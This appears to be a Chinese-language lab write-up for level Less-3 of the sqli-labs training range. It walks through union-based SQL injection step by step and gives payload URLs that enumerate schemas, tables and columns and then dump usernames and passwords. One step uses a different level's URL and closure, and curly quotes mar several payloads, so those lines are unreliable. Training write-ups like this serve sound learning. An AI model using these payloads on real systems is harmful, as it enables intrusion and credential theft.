sqli-labs靶场第三关less-3

sqli-labs靶场第三关less-3

1、确定注入点

http://192.168.128.3/sq/Less-3/?id=1
http://192.168.128.3/sq/Less-3/?id=2
有不同回显，判断可能存在注入，

2、判断注入类型

输入

http://192.168.128.3/sq/Less-3/?id=1 and 1=1
http://192.168.128.3/sq/Less-3/?id=1 and 1=2
回显一致，猜测不是数字型注入

加单引号

http://192.168.128.3/sq/Less-3/?id=1’

根据回显判断闭合情况为 ') 确定为字符型注入

3、确定列数

http://192.168.128.3/sq/Less-3/?id=1’) order by 5 --+
http://192.168.128.3/sq/Less-3/?id=1’) order by 4 --+
http://192.168.128.3/sq/Less-3/?id=1’) order by 3 --+

4，5回显报错，3的时候回显正常
确定列数为3

4、确定回显位

http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,2,3 --+

确定2，3为回显位置

5、确定数据库名，数据库版本

http://192.168.128.3/sq/Less-4/?id=-1") union select 1,version(),database()–+

5、爆出数据库名，表名，列名，数据

• 爆出数据库名
  http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,group_concat(schema_name),3 from information_schema.schemata --+
• 爆出选定数据库表名
  http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()–+
• 爆出列名
  http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’–+
• 爆出数据
  http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,group_concat(username,‘%20’,password),3 from security.users–+

最终得到数据

大功告成